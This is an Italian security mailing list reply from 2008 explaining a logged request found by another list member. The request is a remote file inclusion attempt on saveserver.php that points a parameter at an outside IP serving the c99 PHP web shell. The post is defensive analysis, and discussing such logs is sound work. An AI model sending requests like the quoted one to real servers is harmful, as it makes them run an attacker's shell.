Re: [ml] shell 99

[ Home | Liste | F.A.Q. | Risorse | Cerca... ]

[ Data: precedente | successivo | indice ] [ Argomento: precedente | successivo | indice ]

Archivio: Gennaio 2008 ml@sikurezza.org
Soggetto: Re: [ml] shell 99
Mittente: Stefano Zanero
Data: Thu, 31 Jan 2008 20:15:49 +0100 (CET)

David Galligani wrote:

/admin/business_inc/saveserver.php?thisdir=http://80.231.130.12/wwwroot/c99.txt?

E' un tentativo di eseguire una RFI (remote file include) su quella pagina (saveserver.php). Se il parametro thisdir non e' correttamente validato, il file PHP che hai visto viene eseguito sul tuo server. Pero' l'exploit non e' in quel file: quello e' solo il payload.

<c99host@xxxxxxxxx>


Puoi segnalarlo agli abuse di Google.

--
Cordiali saluti,
Stefano Zanero

Politecnico di Milano - Dip. Elettronica e Informazione
Via Ponzio, 34/5 I-20133 Milano - ITALY
Tel.    +39 02 2399-4017
Fax.    +39 02 2399-3411
E-mail: zanero@xxxxxxxxxxxxxx
Web:    http://home.dei.polimi.it/zanero/

In risposta a:
- [ml] shell 99, David Galligani

Data:
- precedente: Re: [ml] shell 99, Alberto Trivero
- successivo: Re: [ml] Alice Gate2 Plus Wi-Fi Cross-Site Request Forgery Vulnerability, Noiano
- indice

Argomento:
- precedente: Re: [ml] shell 99, Alberto Trivero
- successivo: [ml] Drive-by pharming, GDepalma
- indice

[ Home | Liste | F.A.Q. | Risorse | Cerca... ]

www.sikurezza.org - Italian Security Mailing List
(c) 1999-2005